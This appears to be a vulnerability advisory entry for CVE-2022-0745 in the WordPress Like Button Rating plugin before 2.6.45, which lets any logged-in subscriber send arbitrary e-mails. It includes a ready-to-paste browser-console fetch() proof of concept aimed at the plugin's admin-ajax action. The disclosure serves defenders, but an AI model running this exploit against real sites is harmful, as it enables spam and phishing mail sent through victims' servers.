Lucene search
Krzysztof ZającWPEX-ID:180F8E87-1463-43BB-A901-80031127723AHistoryMay 23, 2022 - 12:00 a.m.
Like Button Rating < 2.6.45 - Arbitrary e-mail Sending
2022-05-2300:00:00
Krzysztof Zając
78
arbitrary e-mail sending
browser developer console
fetch api
wordpress security
EPSS
0.001
Percentile
24.8%
The plugin allows any logged-in user, such as subscriber, to send arbitrary e-mails to any recipient, with any subject and body
As a subscriber, run the below command in the web developer console of the browser
fetch("/wp-admin/admin-ajax.php?action=likebtn_test_vote_notification", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": "options[likebtn_notify_to][email protected]&options[likebtn_notify_subject]=hehehe&options[likebtn_notify_text]=Hopsasa</b><h1>",
"method": "POST",
"credentials": "include"
})
.then(response => response.text())
.then(data => console.log(data));Related
cvelist
cvelist
CVE-2022-0745 Like Button Rating < 2.6.45 - Arbitrary e-mail Sending
2022-06-13 12:41:30
cve
cve
CVE-2022-0745
2022-06-13 13:15:10
patchstack
patchstack
cnvd
cnvd
WordPress Like Button Rating plugin access control error vulnerability
2022-06-15 00:00:00
prion
prion
Information disclosure
2022-06-13 13:15:00
nvd
nvd
CVE-2022-0745
2022-06-13 13:15:10
wpvulndb
wpvulndb
Like Button Rating < 2.6.45 - Arbitrary e-mail Sending
2022-05-23 00:00:00